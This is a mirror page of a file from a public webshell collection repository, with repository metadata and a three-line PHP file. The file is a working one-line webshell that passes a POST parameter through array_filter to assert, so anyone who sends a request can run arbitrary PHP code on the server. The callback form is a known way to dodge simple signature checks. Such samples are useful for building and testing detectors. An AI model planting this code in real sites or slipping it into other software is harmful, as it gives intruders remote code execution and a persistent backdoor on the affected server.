mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
3 lines
56 B
PHP
3 lines
56 B
PHP
<?php
|
|
array_filter(array($_POST['x']),'assert');
|
|
?>
|